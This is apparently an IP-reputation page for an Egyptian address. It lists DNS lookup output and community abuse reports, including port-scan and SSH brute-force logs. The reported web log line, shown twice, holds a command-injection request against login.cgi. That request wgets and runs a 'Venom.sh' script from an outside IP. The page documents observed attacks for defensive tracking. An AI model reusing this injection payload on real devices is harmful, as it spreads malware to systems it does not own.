41.239.144.2 - IPInfo

Basic Info

City: unknown

Region: unknown

Country: Egypt

Internet Service Provider: TE Data

Hostname: unknown

Organization: unknown

Usage Type: Fixed Line ISP

Comments:

Make a comment on this IP

Type	Details	Datetime
attackbots	1 attack on wget probes like: 41.239.144.2 - - [22/Dec/2019:06:34:17 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.132.53.119/Venom.sh%20-O%20-%3E%20/tmp/kh;Venom.sh%20/tmp/kh%27$ HTTP/1.1" 400 11	2019-12-23 21:48:40

Type

Details

Datetime

attackbots

1 attack on wget probes like:
41.239.144.2 - - [22/Dec/2019:06:34:17 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.132.53.119/Venom.sh%20-O%20-%3E%20/tmp/kh;Venom.sh%20/tmp/kh%27$ HTTP/1.1" 400 11

2019-12-23 21:48:40

Comments on same subnet:

No discussion about this subnet yet..

Whois info:

Dig info:

; <<>> DiG 9.10.3-P4-Ubuntu <<>> 41.239.144.2
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 16275
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;41.239.144.2.			IN	A

;; AUTHORITY SECTION:
.			356	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2019122300 1800 900 604800 86400

;; Query time: 106 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Mon Dec 23 21:48:35 CST 2019
;; MSG SIZE  rcvd: 116

Host info

2.144.239.41.in-addr.arpa domain name pointer host-41.239.144.2.tedata.net.

Nslookup info:

Server:		183.60.83.19
Address:	183.60.83.19#53

Non-authoritative answer:
2.144.239.41.in-addr.arpa	name = host-41.239.144.2.tedata.net.

Authoritative answers can be found from:

Related IP info:

Related comments:

IP	Type	Details	Datetime
73.179.171.43	attackspambots	Unauthorized connection attempt detected from IP address 73.179.171.43 to port 81	2019-12-29 19:49:03
64.63.168.14	attackspambots	Unauthorized connection attempt detected from IP address 64.63.168.14 to port 1433	2019-12-29 19:35:27
77.42.93.242	attackspam	Unauthorized connection attempt detected from IP address 77.42.93.242 to port 23	2019-12-29 19:29:24
66.240.205.34	attack	Unauthorized connection attempt detected from IP address 66.240.205.34 to port 81	2019-12-29 19:34:23
45.113.71.103	attackspambots	Unauthorized connection attempt detected from IP address 45.113.71.103 to port 2051	2019-12-29 19:37:17
177.159.249.144	attackspam	Automatic report - Port Scan Attack	2019-12-29 19:18:56
167.99.163.76	attackspam	Dec 29 11:42:19 h2177944 kernel: \[814822.355274\] \[UFW BLOCK\] IN=venet0 OUT= MAC= SRC=167.99.163.76 DST=85.214.117.9 LEN=40 TOS=0x00 PREC=0x00 TTL=52 ID=7171 PROTO=TCP SPT=57271 DPT=23 WINDOW=9047 RES=0x00 SYN URGP=0 Dec 29 11:42:19 h2177944 kernel: \[814822.355287\] \[UFW BLOCK\] IN=venet0 OUT= MAC= SRC=167.99.163.76 DST=85.214.117.9 LEN=40 TOS=0x00 PREC=0x00 TTL=52 ID=7171 PROTO=TCP SPT=57271 DPT=23 WINDOW=9047 RES=0x00 SYN URGP=0 Dec 29 11:42:25 h2177944 kernel: \[814828.257522\] \[UFW BLOCK\] IN=venet0 OUT= MAC= SRC=167.99.163.76 DST=85.214.117.9 LEN=40 TOS=0x00 PREC=0x00 TTL=52 ID=7171 PROTO=TCP SPT=57271 DPT=23 WINDOW=9047 RES=0x00 SYN URGP=0 Dec 29 11:42:25 h2177944 kernel: \[814828.257535\] \[UFW BLOCK\] IN=venet0 OUT= MAC= SRC=167.99.163.76 DST=85.214.117.9 LEN=40 TOS=0x00 PREC=0x00 TTL=52 ID=7171 PROTO=TCP SPT=57271 DPT=23 WINDOW=9047 RES=0x00 SYN URGP=0 Dec 29 11:45:44 h2177944 kernel: \[815026.646613\] \[UFW BLOCK\] IN=venet0 OUT= MAC= SRC=167.99.163.76 DST=85.214.117.9 LEN=40 TOS=0x00 PREC	2019-12-29 19:19:55
66.240.236.119	attack	Unauthorized connection attempt detected from IP address 66.240.236.119 to port 4063	2019-12-29 19:33:50
184.105.247.196	attackspambots	Unauthorized connection attempt detected from IP address 184.105.247.196 to port 3389	2019-12-29 19:17:00
12.139.60.28	attack	Unauthorized connection attempt detected from IP address 12.139.60.28 to port 445	2019-12-29 19:38:43
78.187.201.154	attackbotsspam	Unauthorized connection attempt detected from IP address 78.187.201.154 to port 9090	2019-12-29 19:29:00
87.2.62.107	attack	Unauthorized connection attempt detected from IP address 87.2.62.107 to port 23	2019-12-29 19:26:36
94.74.163.2	attackspam	Unauthorized connection attempt detected from IP address 94.74.163.2 to port 445	2019-12-29 19:46:45
85.97.131.108	attackspam	Unauthorized connection attempt detected from IP address 85.97.131.108 to port 445	2019-12-29 19:47:28
191.243.143.170	attackspambots	Dec 29 09:13:15 server sshd\[18456\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=191.243.143.170 user=nagios Dec 29 09:13:17 server sshd\[18456\]: Failed password for nagios from 191.243.143.170 port 36898 ssh2 Dec 29 09:28:07 server sshd\[21509\]: Invalid user dorcas from 191.243.143.170 Dec 29 09:28:07 server sshd\[21509\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=191.243.143.170 Dec 29 09:28:08 server sshd\[21509\]: Failed password for invalid user dorcas from 191.243.143.170 port 39754 ssh2 ...	2019-12-29 19:50:48

Recently Reported IPs

109.248.10.234	184.154.47.4	111.72.193.208	36.83.177.48
80.78.212.27	68.88.57.174	139.59.58.102	124.205.243.244
54.38.177.98	156.204.163.27	223.113.52.53	123.16.129.68
34.67.151.107	14.173.183.79	182.150.58.161	41.234.203.54
197.55.235.202	83.26.178.159	14.169.221.241	41.233.191.118